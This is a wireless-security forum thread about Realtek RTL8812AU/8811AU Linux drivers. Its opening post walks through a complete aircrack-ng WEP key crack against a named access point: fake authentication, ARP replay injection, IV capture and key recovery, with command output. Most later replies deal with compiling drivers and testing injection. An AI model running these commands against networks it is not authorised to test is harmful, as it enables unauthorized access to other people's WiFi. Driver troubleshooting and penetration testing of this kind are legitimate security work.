Aircrack-ng forum

General Category => Useful stuff => Topic started by: aneki on September 01, 2015, 04:50:42 am

Title: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: aneki on September 01, 2015, 04:50:42 am
Download the Linux WiFi driver.

https://mega.nz/#!f1FHnT5S!LuYHjVofjRl8TlE7T--anLkV-0zBwko2FFMMCypmlGc
or
https://drive.google.com/file/d/0B5CVb15vbMjCeXJsNUFRUUJPZEE/view?usp=sharing

decompress the driver package,and make for compile it.

#insmod 8812au.ko

1. #ifconfig wlan0 up

    Use follow cmd to replace the airmon-ng start wlan0
2. #iwconfig wlan0 mode monitor

3. #airodump-ng wlan0
    or select a channel to site survey ,example: -c 1 is select channel 1.
    #airodump-ng wlan0 -c 1

 CH  1 ][ Elapsed: 4 s ][ 2015-09-01 12:21                                     
                                                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                               
 00:0B:6B:7F:52:56  -74   0        4        0    0   1  54e. WPA2 CCMP   PSK  000_2G_test                       
 24:DE:C6:50:C4:60  -80   0        0        5    1   1  -1   WPA                                     
 00:26:5A:FF:CB:AB  -35 100       54       11    2   1  54e. WEP  WEP         dlink655                       
 00:1D:73:B4:47:81  -40   0       24        0    0   2  54e. OPN              KKKVAP                         
 00:E0:B9:8C:29:42  -35  40       30        0    0   1  54e  WEP  WEP         RTK 11n AP 2.4G                 
 00:E0:4C:97:2B:A4  -54  49       33       18    0   1  54e  OPN              sd4_open                       
 00:3A:9D:B8:F2:C0  -53   0       54        0    0   1  54e. WPA2 CCMP   PSK  WARPSTAR-EF574E-G               
 06:3A:9D:B8:F2:C0  -55   0       44        0    0   1  54e. WEP  WEP         WARPSTAR-EF574E-GW             
 10:0D:7F:87:C0:39  -49  67       52       53    0   1  54e  OPN              NETGEAR-R6300                   
 20:AA:4B:E4:24:A8  -48  90       46        0    0   1  54e  WPA2 CCMP   PSK  CC_854552_q1                   
 00:18:E7:E1:FB:B6  -56  87       35        0    0   1  54e. WPA2 CCMP   PSK  Chromium                       
 68:A3:C4:E4:4F:DE  -53  50       32        0    0   1  54e  WPA2 CCMP   PSK  SX8ex                           
 00:22:6B:70:D0:5C  -60  40       25        0    0   2  54e  WPA2 CCMP   PSK  Arder_2G                       
 00:88:66:55:AA:BB  -57  43       33        0    0   1  54e  OPN              A_AP_24                         
 84:1B:5E:45:02:E4  -56 100       50        1    0   1  54e  OPN              NETGEAR67                       
 00:23:54:DB:31:B0  -58  67       36        0    0   1  54e. WPA  TKIP   PSK  AAA_RT_N11                     
 00:40:5A:AE:AB:C8  -61  38       27        0    0   3  54e. WPA  TKIP   PSK                         
 98:FC:11:5A:0F:8E  -55  52       30        6    0   3  54e  WPA2 CCMP   PSK  SD4CiscoE1000                   
 00:40:5A:AE:AB:C9  -60  55       32        0    0   3  54e. WPA2 TKIP   PSK  SD1_ADSL                       
 48:EE:0C:2B:57:E4  -63   7        5        0    0   1  54e. WPA2 CCMP   PSK                         
 00:E0:4C:11:11:21  -65  35       30        0    0   1  54e. OPN              NETGEAR57_RPT                   
 10:BF:48:3D:FA:9B  -58  26       16        0    0   1  54e  WPA2 CCMP   PSK  SD1-ASUS                       
 5C:63:BF:38:B0:D2  -66  48       31        0    0   1  54e. WPA2 CCMP   PSK  Atheros_JSW                     
 E4:F4:C6:08:49:3D  -65  44       25        0    0   1  54e  OPN              NETGEAR57                       
 00:E4:10:81:96:D1  -65  38       27        0    0   1  54e  OPN              92E 2.4G                       
 D8:EB:97:2A:5C:6D  -67  28       22        0    0   1  54e. WPA2 CCMP   PSK  KAVEN                           
 00:E0:4C:97:2B:9A  -66  11        8        0    0   1  54e  WPA2 CCMP   MGT  pcache123                       
 3C:1E:04:65:0C:13  -68  16       11        1    0   1  54e  WPA2 CCMP   PSK  MY600M                           
 00:A0:B0:D5:FD:98  -69   0        4        4    0   1  54e. WPA2 CCMP   PSK  2222222222                       
 AC:22:0B:31:B7:00  -68  39       17        0    0   1  54e  WPA2 TKIP   MGT  WlanHCK-3167                     
 00:99:11:22:66:78  -67  33       28        0    0   1  54e  OPN              Amped_TitanEX_2.4               
 10:66:82:1E:77:BE  -68  23       18        2    0   1  54e  WPA2 CCMP   PSK  aterm-19010c-g                 
 8C:BE:BE:04:E7:FB  -69   0        9        0    0   1  54e. WPA2 CCMP   PSK  Xiaomi_RTCN1


4. choice AP's ESSID and ENC is WEP
 00:26:5A:FF:CB:AB  -35 100       54       11    2   1  54e. WEP  WEP         dlink655

 Connect to with AP , -a + ESSID, -h + your WLAN MAC address.
#aireplay-ng -1 0 -a 00:26:5A:FF:CB:AB -h 5C:F3:70:09:72:07 wlan0

10:25:59  Waiting for beacon frame (BSSID: 00:26:5A:FF:CB:AB) on channel 1

10:25:59  Sending Authentication Request (Open System) [ACK]
10:25:59  Authentication successful
10:25:59  Sending Association Request [ACK]
10:25:59  Association successful :-) (AID: 1)

5. Wait to receive a ARP Request,and transmit duplicate ARP attack Packets.
#aireplay-ng -3 -b 00:26:5A:FF:CB:AB -h 5C:F3:70:09:72:07 wlan0

10:26:03  Waiting for beacon frame (BSSID: 00:26:5A:FF:CB:AB) on channel 1
Saving ARP requests in replay_arp-0901-102603.cap
You should also start airodump-ng to capture replies.
58319 packets (got 14550 ARP requests and 23648 ACKs), sent 57675 packets...(499 pps)

6. Open an another window,execute CMD for Capture WEP IVs packet data.
#airodump-ng -c 1 --bssid 00:26:5A:FF:CB:AB -w wep wlan0

 CH  1 ][ Elapsed: 1 min ][ 2015-09-01 10:28                                         
                                                                                                                 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                 
 00:26:5A:FF:CB:AB  -32   6      675    12443   73   1  54e. WEP  WEP         dlink655                           
                                                                                                                 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                       
                                                                                                                 
 00:26:5A:FF:CB:AB  5C:F3:70:09:72:07    0   12 - 1      0    48434

7. Wait for  Capture #DATA number over the 10000,execute crack and find KEY.
  #aircrack-ng -b 00:26:5A:FF:CB:AB wep-01.cap

                                                  Aircrack-ng 1.2 beta3


                                  [00:00:04] Tested 59712 keys (got 10816 IVs)

   KB    depth   byte(vote)
    0    6/  8   BD(14592) 12(14080) 38(14080) BB(14080) D0(14080) 6A(13824) C2(13824) 01(13568)
    1    0/  2   34(18176) 68(15872) D7(14848) E7(14592) 15(14336) EE(14336) F0(14336) 07(14080)
    2    4/ 85   56(14336) 83(14336) BE(14080) C9(14080) 2C(13824) 18(13568) 3C(13568) 43(13568)
    3    2/ 10   78(14848) F0(14848) 08(14848) 5E(14848) 83(14592) 52(14336) E5(14080) 68(14080)
    4    0/  5   90(17664) 85(15360) 07(14848) 67(14592) 12(14592) 82(14336) A0(14336) 0E(14080)

                         KEY FOUND! [ 12:34:56:78:90 ]
 Decrypted correctly: 100%

Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: bubo99 on September 20, 2015, 10:05:54 pm
Hello

I'd like to ask: Where did you get the 4.3.22 version? Is there some site with Realtek's newest version or have you found it just by a chance?

Thanks
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on September 21, 2015, 07:49:42 am
Unfortunately, it doesn't compile on recent kernels and other drivers (on GitHub) don't support monitor mode. And it doesn't look that bright, kernel devs don't seem very interested in having such USB adapter supported (mac80211) anytime soon.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: bubo99 on September 21, 2015, 08:28:07 am
Unfortunately, it doesn't compile on recent kernels and other drivers (on GitHub) don't support monitor mode. And it doesn't look that bright, kernel devs don't seem very interested in having such USB adapter supported (mac80211) anytime soon.

It's very probable that I can get it working on latest kernels. I maintain Archlinux package with v4.3.14 driver: https://aur.archlinux.org/packages/rtl8812au_rtl8821au-dkms-git/ and https://github.com/Grawp/rtl8812au_rtl8821au . However before I get to work I'd like to know where this .22 version comes from and if we can track the latest Realtek's verison somehow, because I stamped on v4.3.14 just by an accident on some forum ... most people still use/maintain the old 4.3.8 or even 4.2.2 version. It really is a mess!
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on September 22, 2015, 03:48:32 am
When that happens, let me know so that I can get it integrated in Kali too.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: bubo99 on September 23, 2015, 08:44:36 am
When that happens, let me know so that I can get it integrated in Kali too.

OK
Btw. I'm still waiting for a reply from @aneki to see if he has some good source of latest Realtek drivers though.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: ninebits on October 01, 2015, 08:20:57 pm
hey guys, I was able to get the driver to compile on Ubuntu 14.04 LTS and run a successful injection test (aireplay-ng -9 wlan0). I do believe, however, there are some bugs that need fixing. Here's a list of what I found:
1. (not really a bug) Certain manufactures selling the RTL8812AU are not listed in the source code, I'm using a TP-Link and I had to hard code the USB device ID.
2. The system can potentially hang either when putting the card into monitor mode or starting airodump-ng. The error message displayed is "RTL871X: HwRateToMRate(): Non Supported Rate [ff]!!! "
3. Manually restricting the adapter to a single channel doesn't seem to take. I tested this by restricting it to only a and it jumped back to bg after starting airodump. I also couldn't see any traffic on a, at all. I have about a dozen Cisco aps around me all running ac and nothing was picked up.
4. Airmon-ng doesn't see the card, I have to put it into monitor mode using iwconfig

I'm gonna try to play around with it a little bit more and see if the experience can be improved.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: bubo99 on October 03, 2015, 11:08:09 pm
hey guys, I was able to get the driver to compile on Ubuntu 14.04 LTS and run a successful injection test (aireplay-ng -9 wlan0). I do believe, however, there are some bugs that need fixing. Here's a list of what I found:
1. (not really a bug) Certain manufactures selling the RTL8812AU are not listed in the source code, I'm using a TP-Link and I had to hard code the USB device ID.
2. The system can potentially hang either when putting the card into monitor mode or starting airodump-ng. The error message displayed is "RTL871X: HwRateToMRate(): Non Supported Rate [ff]!!! "
3. Manually restricting the adapter to a single channel doesn't seem to take. I tested this by restricting it to only a and it jumped back to bg after starting airodump. I also couldn't see any traffic on a, at all. I have about a dozen Cisco aps around me all running ac and nothing was picked up.
4. Airmon-ng doesn't see the card, I have to put it into monitor mode using iwconfig

I'm gonna try to play around with it a little bit more and see if the experience can be improved.
Have you noticed the filename of the archive? rtl8812AU_8821AU_linux_v4.3.22_15054.20150901_beta.tar.gz .. The _beta suffix is quite .. unsettling.
Btw. I have a patched driver - compile-able on Linux 4.2 - on my github: https://github.com/Grawp/rtl8812au_rtl8821au/tree/4.3.22
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on October 04, 2015, 02:33:13 am
Quick question: do we just have to run 'make' to compile?

If yes, would you be able to make it compilable on Kali 2.0? Here is the compile log:

Code: [Select]
make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/4.0.0-kali1-amd64/build M=/root/8812AU/rtl8812au_rtl8821au  modules
make[1]: Entering directory '/usr/src/linux-headers-4.0.0-kali1-amd64'
Makefile:10: *** mixed implicit and normal rules: deprecated syntax
  CC [M]  /root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o
cc1: error: -Werror=incompatible-pointer-types: no option -Wincompatible-pointer-types
/usr/src/linux-headers-4.0.0-kali1-common/scripts/Makefile.build:263: recipe for target '/root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o' failed
make[4]: *** [/root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o] Error 1
/usr/src/linux-headers-4.0.0-kali1-common/Makefile:1407: recipe for target '_module_/root/8812AU/rtl8812au_rtl8821au' failed
make[3]: *** [_module_/root/8812AU/rtl8812au_rtl8821au] Error 2
Makefile:145: recipe for target 'sub-make' failed
make[2]: *** [sub-make] Error 2
Makefile:8: recipe for target 'all' failed
make[1]: *** [all] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.0.0-kali1-amd64'
Makefile:1565: recipe for target 'modules' failed
make: *** [modules] Error 2
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: ninebits on October 04, 2015, 03:46:46 am
Some good news, after installing aircrack-ng from the latest source files airodump isn't hanging the system anymore. It's actually pretty usable right now. However the "Non supported rate" error message still gets logged.

Originally I thought the problem was the driver because i had the system croke not only when starting airodump but it also happened a couple of times when putting the card into monitor mode,  although this wasn't happening often. I got suspicious when wireshark had no issues capturing traffic, then I noticed a big version difference between Ubuntu's reps and the site.

I know the driver is only a beta (i was actually reluctant to try it at first) but honestly now it's running surprisingly smooth on both frequencies.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: bubo99 on October 04, 2015, 07:31:37 am
Quick question: do we just have to run 'make' to compile?

If yes, would you be able to make it compilable on Kali 2.0? Here is the compile log:

Code: [Select]
make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/4.0.0-kali1-amd64/build M=/root/8812AU/rtl8812au_rtl8821au  modules
make[1]: Entering directory '/usr/src/linux-headers-4.0.0-kali1-amd64'
Makefile:10: *** mixed implicit and normal rules: deprecated syntax
  CC [M]  /root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o
cc1: error: -Werror=incompatible-pointer-types: no option -Wincompatible-pointer-types
/usr/src/linux-headers-4.0.0-kali1-common/scripts/Makefile.build:263: recipe for target '/root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o' failed
make[4]: *** [/root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o] Error 1
/usr/src/linux-headers-4.0.0-kali1-common/Makefile:1407: recipe for target '_module_/root/8812AU/rtl8812au_rtl8821au' failed
make[3]: *** [_module_/root/8812AU/rtl8812au_rtl8821au] Error 2
Makefile:145: recipe for target 'sub-make' failed
make[2]: *** [sub-make] Error 2
Makefile:8: recipe for target 'all' failed
make[1]: *** [all] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.0.0-kali1-amd64'
Makefile:1565: recipe for target 'modules' failed
make: *** [modules] Error 2
Just plain 'make' suffices. Seems like old GCC is causing the problem. See https://github.com/Grawp/rtl8812au_rtl8821au/issues/1 . Disable the option or use newer GCC.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kwidugmd8373 on October 12, 2015, 01:19:46 pm
Hello from Russia!
Firstly, I want to thank you for this driver. (I was already thinking about how to sell my DWA-171 dongle)
Secondly, I'd like to mention here an error occured while I was trying to compile.

Here is the error (file rtw_debug.c):

In function 'dump _drv_version':
71:64: error: macro "__DATE__"might prevent reproducible builds [-Werre-date-time]
71:64: error: macro "__TIME__"might prevent reproducible builds [-Werre-date-time]


I have fixed this by deleting the line "DBG_871X_SEL_NL(sel, "build time: %s %s\n", __DATE__, __TIME__);"

Pros of using your driver:

1) Ability to use monitor mode.
2) The system no more hanging after usb wifi device disconnect.

One more time. Thank you.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: fenixdoido on November 06, 2015, 03:12:04 pm
Hello guys.
I have a Edimax AC600 RTL8812au Dual Band device and I`m using Kali Sana.
First i downloaded the driver on op post, edited device on os_dep/linux/usb_intf.c to add the ID
Code: [Select]
{USB_DEVICE(0x7392, 0xA812),.driver_info = RTL8812}, /* Edimax - Edimax */
Then i had to disable that _DATE_ errors and finally make/make install/reboot.

Ok,

Code: [Select]
root@kali:~# iwconfig
wlan3     unassociated  Nickname:"<WIFI@REALTEK>"
          Mode:Managed  Frequency=2.412 GHz  Access Point: Not-Associated   
          Sensitivity:0/0 
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

eth0      no wireless extensions.


Code: [Select]
root@kali:~# airmon-ng
PHY Interface Driver Chipset

phy1 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy0 wlan3 rtl8821au Edimax Technology Co., Ltd

Code: [Select]
root@kali:~# airmon-ng start wlan3
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
  650 NetworkManager
  752 wpa_supplicant
  864 avahi-daemon
  865 avahi-daemon
 1409 dhclient

PHY Interface Driver Chipset

phy1 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy0 wlan3 rtl8821au Edimax Technology Co., Ltd command failed: Operation not supported (-95)

(mac80211 monitor mode vif enabled for [phy0]wlan3 on [phy0]wlan3mon)
(mac80211 station mode vif disabled for [phy0]wlan3)

Code: [Select]
root@kali:~# iwconfig
wlan3mon  IEEE 802.11abg  Mode:Monitor  Tx-Power=12 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
         
Code: [Select]
airodump-ng wlan3mon
 CH 10 ][ Elapsed: 48 s ][ 2015-11-06 12:55                                         
                                                                                                                               
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                               
                                                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                     
                                                                                                                   

Code: [Select]
root@kali:~# aireplay-ng -9 wlan3mon
12:55:59  Trying broadcast probe requests...
12:56:01  No Answer...
12:56:01  Found 0 APs
root@kali:~# aireplay-ng -9 wlan3mon
12:56:03  Trying broadcast probe requests...
12:56:05  No Answer...
12:56:05  Found 0 APs

Code: [Select]
root@kali:~# lsusb
Bus 001 Device 002: ID 7392:a812 Edimax Technology Co., Ltd

If i try to stop it using airmon-ng
Code: [Select]
root@kali:~# airmon-ng stop wlan3mon
PHY Interface Driver Chipset

phy1 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)

ethtool failed...
Only mac80211 devices on kernel 2.6.33 or higher are officially supported by airmon-ng.


Anything i can do to try to fix this?
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on November 07, 2015, 12:21:14 am
First thing to do is killing network managers. Not after putting in monitor mode, before. Solves 99% of the issues.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kcdtv on May 31, 2016, 10:13:12 am
Hi there!  :)
I am trying to get this USB to work properly
I am using kali rolling updated
Code: [Select]
4.5.0-kali1-amd64 #1 SMP Debian 4.5.3-2kali1 (2016-05-09) x86_64 GNU/Linux
I use the driver downloaded form this github branch https://github.com/diederikdehaas/rtl8812AU (https://github.com/diederikdehaas/rtl8812AU) because i didn't have any error compiling
Code: [Select]
git clone https://github.com/diederikdehaas/rtl8812AU.git && cd rtl8812AU && make && sudo make install
  In mode manged, it is... simply the best.
Amazing USB in 2.4 Ghz and 5 Ghz frequencies.

  Mode monitor... mission is possible with iwconfig, very good sensibilty, but injection doesn't works
I sent form time to time a single ACK while i desauth and injection test looks like this
(https://www.wifi-libre.com/img/members/3/AWUS036ACH_13.jpg)
i don't put the 20 PA because it is all the same : 0% injection rate

  with airmon-ng that what happens
Code: [Select]
sudo airmon-ng

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy15 wlan1 ?????? Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
The driver is not properly detected.
First question : How could i repair that? 

than i check kill and start monitor mode
Code: [Select]
sudo airmon-ng check kill

Killing these processes:

  PID Name
  674 wpa_supplicant
 3205 avahi-daemon-ch
Code: [Select]
sudo airmon-ng start wlan1


PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy15 wlan1 ?????? Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
cat: /sys/class/ieee80211/phy15/device/net/wlan1mon/type: No existe el fichero o el directorio

Newly created monitor mode interface wlan1mon is *NOT* in monitor mode.
Removing non-monitor wlan1mon interface...


airmon-ng is not able to create wlan1mon folder instead of wlan1.
Any idea to solve this problem?
Could fenixdoido upload the folder he gets as he manage to create one (i would like to play around with it)
I tryed to made some mod of the driver but i am useless and very limited, i don't know a shit  :P
dmseg des not tel much,,,
could that be a hint?
Code: [Select]
[ 9244.665299] RTL871X: nolinked power save enter
[ 9249.810218] RTL871X: nolinked power save leave

this is a great USB, it would be so nice to get it works properly...
Cheers
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: orp on July 12, 2016, 01:53:49 pm
I'm also trying to perform packet injection with the device. While I do manage to get it to work in monitor mode, injection doesn't work.
I've tried a large number of drivers already and none worked.

Did someone manage to get packet injection to work?
According to the original poster in this forum he did do it using the drivers he provided. I installed the same drivers and it didn't work.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: Bianco8 on August 15, 2016, 02:35:15 am
I'm also trying to perform packet injection with the device. While I do manage to get it to work in monitor mode, injection doesn't work.
I've tried a large number of drivers already and none worked.

Did someone manage to get packet injection to work?
According to the original poster in this forum he did do it using the drivers he provided. I installed the same drivers and it didn't work.

There are news? Someone managed to get injection working?
Thanks!
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: skan on September 22, 2016, 10:37:09 am
I'm also interested.
I've tried all these drivers:

https://github.com/Grawp/rtl8812au_rtl8821au
https://github.com/ulli-kroll/rtl8821au
https://github.com/abperiasamy/rtl8812AU_8821AU_linux
https://github.com/diederikdehaas/rtl8812AU

The last one also has a newer beta version, 4.3.22.
None of them work. Some even make the system crash.
There are other but much older.

If you want to add a new one to the list or comment anything please feel free to do it.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: nobotro on September 23, 2016, 11:57:13 am
skan

i have installed old version of ubuntu ,ubuntu 12.10

when i installed drivers which is on first post and its work.packet injection works also ;)
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: cristi_28 on January 25, 2017, 09:29:28 pm
When that happens, let me know so that I can get it integrated in Kali too.
monitor mode and frame injection work with reaver bully  https://github.com/astsam/rtl8812au
4.8.0-kali2-686-pae
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: iceproject on January 28, 2017, 09:52:24 am
When that happens, let me know so that I can get it integrated in Kali too.
monitor mode and frame injection work with reaver bully  https://github.com/astsam/rtl8812au
4.8.0-kali2-686-pae

I agree please check misterx
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kcdtv on February 01, 2017, 01:35:02 pm
Injection works smoothly with astam drivers  8)
(https://www.wifi-libre.com/img/members/3/victoriaalfa.jpg)
The little fails with this drivers:
  airmon-ng
        -Does not enable the monitor mode, i don't really understand why, it fails at creating the interface wlanXmon.
        - Chipset column stdout is ????
  airodump-ng
       No channel hopping
   txpower management
       Not available
  For the rest the results are very good,
This chipsets as a lot of potential.
  Theses drivers too (and should be in backport)  :)
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kcdtv on April 11, 2017, 12:11:28 pm
summing up the situation
 1) In the first message of this post there is no packet injection with the driver used by the user, WEP crack is done by sniffing traffic generated by a legitimate client. 
 2) The drivers to be used are coming from here:  https://github.com/astsam/rtl8812au (https://github.com/astsam/rtl8812au)  (by astsam)
 The branch that has more bugs corrected and more features (such as high power) is v4.3.21
 3) There is a dkms package in Kali Linux for astsam drivers (branch 4.3.21)
Code: [Select]
sudo apt get install realtek-rtl88xxau-dkmsThe packet is already available in kali-dev repositories  and will be soon included in kali rolling repositories (maybe it is already there)
Bugtrack Kali: https://bugs.kali.org/view.php?id=3260#c6577 (https://bugs.kali.org/view.php?id=3260#c6577)
  You need to enable mode monitor with iwconfig with this driver
The driver works with all aircrack-ng utilities, reaver, hostapd... It works well in both bands, mode monitor & injection.
  It is compatible with rtl8812AU & rtl8814AU
     Enjoy!  :)
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on April 18, 2017, 01:46:16 am
For anybody wondering, it's in the main repos now.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: Chaostar on April 18, 2017, 04:25:03 am
Any ideas about rtl8811AU?
Thanks!
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kcdtv on April 18, 2017, 11:13:42 am
Hi Chaostar!
I was not aware about rtl8811 existence.  :D
If you use Kali linux try with the dkms package and tell us how it went.
If you don't have kali linux or if the dkms package didn't work with your chipset, try to install the drivers using the source code:
Code: [Select]
git clone -b v4.3.21 https://github.com/astsam/rtl8812au.git
Code: [Select]
cd rtl8812au
Code: [Select]
make RTL8811=1 DEBUG=1
Code: [Select]
sudo make installPlease do some feedback: Like this astsam will be able to fix the issue if there is one. 
Have a  good day! :) 
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: kurimson on May 22, 2017, 12:06:55 pm
Hi Chaostar!
I was not aware about rtl8811 existence.  :D
If you use Kali linux try with the dkms package and tell us how it went.
If you don't have kali linux or if the dkms package didn't work with your chipset, try to install the drivers using the source code:
Code: [Select]
git clone -b v4.3.21 https://github.com/astsam/rtl8812au.git
Code: [Select]
cd rtl8812au
Code: [Select]
make RTL8811=1 DEBUG=1
Code: [Select]
sudo make installPlease do some feedback: Like this astsam will be able to fix the issue if there is one. 
Have a  good day! :)

So I tried to install Kali linux on my VMware Fusion on my Mac OS laptop,
After different methods, I tried with dkms package without success.
But with manual installation list above, I get my usb dongle wifi working.
My usb dongle is RTL8811au.

Thanks Guys :)
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: HackGuru on July 19, 2017, 12:00:02 pm
This worked!!!!!!!!
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: Matthew on September 01, 2017, 07:50:00 pm
I can't get the git package to make... Any ideas?
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on September 01, 2017, 10:05:40 pm
Matthew, those screenshots are text only, so next time, please just copy and paste the text.

Try https://github.com/aircrack-ng/rtl8812au instead.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: catzlol on September 06, 2017, 10:50:01 pm
Hey all,

Just wanted to mention that I have had success with monitoring and injection using a card with 8811au chipset using the realtek-rtl88xxau-dkms driver;  the card is an EDUP EP-AC1607 (https://wikidevi.com/wiki/EDUP_EP-AC1607 (https://wikidevi.com/wiki/EDUP_EP-AC1607)). One bug I have is that I cannot get the card to enter monitor mode with airmon-ng, and that I must use the iwconfig instead.

Code: [Select]
root@kali:~# airmon-ng check kill

Killing these processes:

  PID Name
  489 dhclient
  581 wpa_supplicant

root@kali:~# airmon-ng start wlan0


PHY Interface Driver Chipset

phy0 wlan0 8812au Realtek Semiconductor Corp.
cat: /sys/class/ieee80211/phy0/device/net/wlan0mon/type: No such file or directory

Newly created monitor mode interface wlan0mon is *NOT* in monitor mode.
Removing non-monitor wlan0mon interface...

WARNING: unable to start monitor mode, please run "airmon-ng check kill"


However, using iwconfig works:

Code: [Select]
root@kali:~# ifconfig wlan0 down
root@kali:~# iwconfig wlan0 mode monitor
root@kali:~# ifconfig wlan0 up
root@kali:~# aireplay-ng -9 wlan0
18:28:05  Trying broadcast probe requests...
18:28:06  Injection is working!
18:28:07  Found 20 APs

18:28:07  Trying directed probe requests...
18:28:07  XX:XX:XX:XX:XX:XX - channel: 1 - 'XXXXXXXX'
...

kurimson, did you get it to work when you manually installed drivers?
Any help would be much appreciated.

Cheers,
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on September 10, 2017, 04:20:38 am
catzlol, you cannot put it in monitor mode with airmon-ng becaus it's not a mac80211 driver, it's a mix of old and new. Check blog.aircrack-ng.org where I talk more about it
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: PlasticbagsAU on September 19, 2017, 06:08:38 pm
How did you go about installing this?

I tried this in kali with

git clone https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au

sudo make install RTL8814=1
ERROR "install -p -m 644 814au.ko No such file or directory
Makefile:1863: recipe for target install failed
make: **** [install] Error 1

So I tried DKMS

apt-get install dkms

Reboot

sudo ./dkms-install.sh
command not found

So I then tried

sudo sh ./dkms-install sh

and it seemed to install but says its missing kernel headers

And the driver doesnt work still ;(

And its 5.1 so i probably still cant change the txpower
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: misterx on September 19, 2017, 06:14:43 pm
Have you read the instructions? You need to run make before make install.
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
Post by: PlasticbagsAU on September 19, 2017, 06:54:20 pm
Have you read the instructions? You need to run make before make install.

Yes, I did run this sorry for not putting it in

after gitcloning i go to the directory and write

make

and I get the error

make ARCJ=x86_64 CROSS+COMPILE= -C /lib/modules/4.9.0-kali3-amd64/build M=root..local/share/Trash/files/rtl8812.au.5 modules
make[1]: *** /lib/modules/4.9.0-kali3-amd64/build: No such file or directory Stop
Makefile:17171: recipe for target 'modules' failed
make: *** [modules] Error 2
Title: Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
